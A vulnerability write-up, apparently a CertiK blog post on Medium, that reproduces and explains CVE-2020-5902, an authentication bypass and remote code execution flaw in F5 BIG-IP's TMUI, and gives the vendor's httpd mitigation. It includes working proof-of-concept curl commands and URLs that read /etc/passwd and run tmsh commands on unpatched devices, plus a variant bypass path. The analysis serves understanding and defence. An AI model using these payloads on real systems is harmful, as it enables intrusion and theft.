CVE-2020–5902 Analysis, F5 BIG-IP RCE Vulnerability

CertiK
CertiK
Jul 2, 2020 · 5 min read

Last weekend, the cybersecurity sphere was in a buzz about the new entry in the Common Vulnerabilities and Exposures database: CVE-2020–5902, a remote code execution vulnerability in F5 BIG-IP devices. Most of the discussion thus far has focused on how to find targets and exploit vulnerabilities; however, one of CertiK’s security researchers decided it was time to do some digging. He downloaded the vulnerable program, built the environment to reproduce the vulnerability, and analyzed the cause of the vulnerability. Read on to learn what he discovered.

BIG-IP devices, made by F5 Networks, integrate functions such as network traffic management, application security management, and load balancing. In other words, they’re hardware that have built-in functionalities that make networks more efficient, reliable, and secure. Mikhail Klyuchnikov, a researcher at Positive Technologies, discovered a remote code execution vulnerability in its Traffic Management User Interface (TMUI), registered under CVE-2020–5902.

The CVSS score for this vulnerability is 10, which means it’s a critical issue that has major repercussions if exploited. An attacker can use the vulnerability to create or delete files, shut down services, execute arbitrary system commands, and ultimately gain full control of the server.

For the specific expression of CVE, please refer to the reference link.

Affected BIG-IP Software Versions

  • 15.0.0–15.1.0.3
  • 14.1.0–14.1.2.5
  • 13.1.0–13.1.3.3
  • 12.1.0–12.1.5.1
  • 11.6.1–11.6.5.1

Proof-of-Concept Exploit

Arbitrary file read:

curl -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

Remote tmsh command execution:

curl -k 'https://\[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Temporary fix provided by F5 (will discuss in further detail later):

Reproducing the Vulnerability

Next, download the image file for VMware Fusion, named: “BIGIP-15.0.0–0.0.39.ALL_1SLOT-vmware.ova-Image fileset for VMware ESX/i Server”

Import virtual machine image in VMware Fusion:

Use the default credentials to login the virtual machine.

Username: root

Password: default

After the system is fully initialized, use the command ‘ifconfig’ to obtain the IP address for the virtual machine. The IP address for our virtual machine is 172.16.4.137.

Visit the BIG-IP TMUI login interface https://172.16.4.137/tmui/login.jsp in a browser.

Proof-of-Concept for arbitrary file read

Visit the url below for the content of /etc/passwd

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Proof-of-Concept for tmsh command execution https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Vulnerability Analysis

Before jumping into the vulnerability detail, we want to mention that the fileRead.jsp and tmshCmd.jsp files can be accessed by authenticated users by default.

To access fileRead.jsp, an authenticated user can use the following URL:

https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

The following GIF shows the difference between visiting the URL prior to and after login; unauthenticated sessions will result in the user being redirected to the login page.

Although fileRead.jsp and tmshCmd.jsp are used in the Proof-of-Concept exploit, they are not the problem here. The root cause of the vulnerability is how Apache and Java (Tomcat) parse the URL differently, allowing users to bypass authentication and invoke JSP modules. This type of vulnerability was mentioned in the 2018 Blackhat talk from “Orange”: Breaking Parser Logic Take Your Path Normalization Off and Pop 0Days Out”. Check out the presentation here.

Back to the CVE, the BIG-IP application server parses the URL twice. The first parsing is done by httpd (Apache) and the second time by Java (Tomcat).

When the URL is parsed by Apache for the first time, Apaches cares only about the first half of the URL:

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Apache sees login.jsp, a file that unauthorized users can visit. It then passes the URL to the second parser, ignoring the /..;/ in the URL.

When the URL is parsed for the second time by Java (Tomcat), the /..;/ is interpreted as "back up one level of directory". Now /login.jsp/ and /..;/ offset each other.

The URL changes from

https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

to:

https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

The fileRead.jsp file gets executed and returns the contents of the /etc/passwd file.

Based on what we’ve already mentioned, we can also find another URL to exploit the vulnerability, such as:

https://172.16.4.137/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

Here, the https://172.16.4.137/tmui/tmui/login/legal.html is similar to login.jsp, which is a page that doesn't require authentication. However we need two /..;/ to offset /login/legal.html.

Back to the temporary fix mentioned by F5, the fix is to add the following rule in the httpd config:

include '
<LocationMatch ".\*\.\.;.\*">
Redirect 404 /
</LocationMatch>
'

The rule configures httpd to detect if the URL contains the pattern ..;/, if the pattern is detected, httpd returns 404 not found, instead of passing the URL to the second layer in the backend.

How CertiK Can Help

CertiK’s security team will help you secure your programs to give you peace of mind by monitoring the occurrence of threats and alerting you to vulnerabilities as soon as they’re discovered to give you all the details and suggestions to implement protective measures. This will help ensure that your system is secure against attacks.

When new vulnerabilities are discovered, our team of security researchers are interested not only in learning to exploit the vulnerabilities, but also to explore the root cause behind them. We use these opportunities to accumulate experience and knowledge to better train our team to find hidden loopholes in complex systems.

For the latest updates, follow us on Twitter (@certik.io) or subscribe to our mailing list.

References

Originally published at https://certik.io on July 7, 2020.

CertiK

Secure the Crypto World

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store